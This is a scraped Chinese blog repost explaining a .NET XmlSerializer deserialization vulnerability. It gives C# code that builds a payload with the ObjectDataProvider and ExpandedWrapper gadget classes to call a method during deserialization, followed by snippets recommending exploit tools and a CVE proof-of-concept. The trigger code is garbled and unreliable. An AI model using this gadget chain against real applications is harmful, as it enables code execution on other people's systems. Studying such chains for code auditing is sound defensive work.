.Net反序列化漏洞之XmlSerializer

最新推荐文章于 2023-03-15 21:41:36 发布
最新推荐文章于 2023-03-15 21:41:36 发布
阅读量208 收藏
点赞数
原文链接:https://yq.aliyun.com/articles/519191
版权

条件:

  1. 初始化对象时,类型可控:new XmlSerializer(type可控)
  2. 反序列化对象时,输入内容可控:serializer.Deserialize(fi可控)

两个关键类:ObjectDataProvider, ExpandedWrapper

//PresentationFramework.dll  v4.0.0.0
System.Windows.Data.ObjectDataProvider

//System.Data.Services.dll   v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper

Payload生成:

        public static void serializeObjectWithXmlSer()
        {
            ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2,ObjectDataProvider>();
            XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
            eobj.ProjectedProperty0 = new ObjectDataProvider();
            eobj.ProjectedProperty0.ObjectInstance = new Class2();
            eobj.ProjectedProperty0.MethodName = "writeFile";
            eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
            eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");

            TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
            serializer.Serialize(fo, eobj);
            fo.Close();
        }

触发Payload:

public static void deserializeObjectWithXmlSer()
        newtypeofnew"d:/tmp/xmlser.txt" ,如需转载请自行联系原作者
weixin_34161083
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反序列化漏洞详解
xcxhzjl的博客
11-18 1万+
一、反序列化漏洞原理 1、相关概念 序列化(Serialization):将对象的状态信息转换为可以存储或传输的形式的过程,一般将对象转换为字节流。序列化时,对象的当前状态被写入到临时或持久性存储区。 反序列化(Deserialization):从序列化的表示形式中提取数据,即把有序字节流恢复为 2、序列化出现场景 ●远程和进程间通信(RPC/IPC) ●连线协议、Web服务、消息代理 ●缓存/持久性 ●数据库、缓存服务器、文件系统 ●HTTP cookie、HTML表单参数、API身份验
.NET反序列化利用链萌新入门——XmlSerializer
Innocence_0的博客
11-21 155
1.如果new XmlSerializer(type)的type可控,即可能存在反序列化漏洞。2.通过XamlReader.Parse()绕过Process无法序列化的问题。在其他攻击链中还会用到。
.NET高级代码审计(第一课)XmlSerializer反序列漏洞
zls365365的博客
06-04 697
0X00 前言在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET 对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET 类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反...
.net反序列化--Json.Net
顶峰
03-15 352
net反序列化
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Shiro反序列化漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的反序列化漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 反序列化漏洞通常出现在应用程序接收到...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
CVE-2019-18935:RCE漏洞用于ASP.NET AJAX的Telerik UI中的.NET JSON反序列化漏洞
05-25
CVE-2019-18935 Telerik UI中用于ASP.NET AJAX的.NET JSON反序列化漏洞的概念验证漏洞,允许远程执行代码。 描述 是用于Web应用程序的UI组件的广泛使用的套件。 它以不安全的方式反序列化JSON对象,从而导致在软件的基础主机上执行任意远程代码。 有关更多信息,请参见: DerpCon演讲( )详细介绍了利用不安全的反序列化的其他基础知识,并将其应用于这种利用,并逐步介绍了一些在ASP.NET Web应用程序上获取shell的技巧。 该主教福克斯,包括此漏洞的完整的演练,并利用此问题的详细信息(带补丁的说明一起)。 入门 先决条件 您需要安装才能使用build-dll.bat编译混合模式.NET程序集DLL有效负载。 安装 git clone https://github.com/noperator/CVE-2019-18935.git &&
ASP.NET中JSON的序列化和反序列化
javababy1
01-15 152
导读:JSON是专门为浏览器中的网页上运行的JavaScript代码而设计的一种数据格式。在网站应用中使用JSON的场景越来越多,本文介绍 ASP.NET中JSON的序列化和反序列化,主要对JSON的简单介绍,ASP.NET如何序列化和反序列化的处理,在序列化和反序列化对日期时间、集合、字典的处理。 一、JSON简介 JSON(JavaScript Object Notation,Java...
反序列化漏洞原理从零学起-小白都能懂反序列化漏洞
silencediors的博客
11-06 1025
前言 鼓起很大的勇气写这篇博文,不想承认我一直以来对反序列化漏洞就是一知半解的事实。其实我一直对反序列化漏洞有个执念,就是在我java这门语言完全不懂的时候我就非要去研究java的各种反序列化,然后把自己逼到一个绝路,大概这个持续时间有一两个月,还是一头雾水。后来我慢慢读代码,不懂的百度,也跟进学习,直到我有一天接触到php反序列化,哦,原来反序列化是这样。记得当时java里面的各种rmi,反射链...
简单描述Json反序列化出现漏洞的原因
悟已往之不谏,知来者之可追
12-08 953
背景简介 Json序列化就是将数据对象转化为Json字符串。在序列化过程中抛弃了类型信息,所以反序列化时候只有提供类型信息才能准确的反序列化。 序列化通过会通过网络传输对象,而对象中往往有敏感信息,所以序列化常常成为黑客的攻击点,攻击者巧妙的利用反序列化过程构造恶意代码,使得程序在反序列化过程中执行任意代码。 Java工程中经常使用的Apache Commons Collections、Jacks...
反序列化漏洞CVE-2017-10271复现
春日野穹
10-23 1789
0x1 漏洞详情 Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Security子组件存在安全漏洞。使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器 的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性 0x2 漏洞检测 通过常用的反序列化工具检测可以发现...
.net 获取xml 属性值_【硬货分享】.NET高级代码审计:DataContractSerializer反序列化漏洞...
weixin_33536190的博客
12-10 469
作者:Ivan1ee@360云影实验室0X00 前言DataContractSerializer类用于序列化和反序列化Windows Communication Foundation (WCF) 消息中发送的数据,用于把CLR数据类型序列化成XML流,它位于命名空间System.Runtime.Serialization,继承于System.Runtime.Serialization.XmlObj...
浙江海洋大学考研8个学院,42个专业课历年考试真题及答案汇总,备考资料题库笔记,考前题库汇总.pdf
最新发布
07-16
浙江海洋大学考研8个学院,42个专业课历年考试真题及答案汇总,备考资料题库笔记,考前题库汇总.pdf
.NET高级代码审计(第五课) .NET Remoting反序列化漏洞1
08-03
本文主要介绍了.NET Remoting反序列化漏洞,特别是通过使用SoapServerFormatterSinkProvider类来实现远程代码执行攻击的漏洞。文章首先介绍了最近公布的.NET Remoting反序列化安全风险,即当服务端使用了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值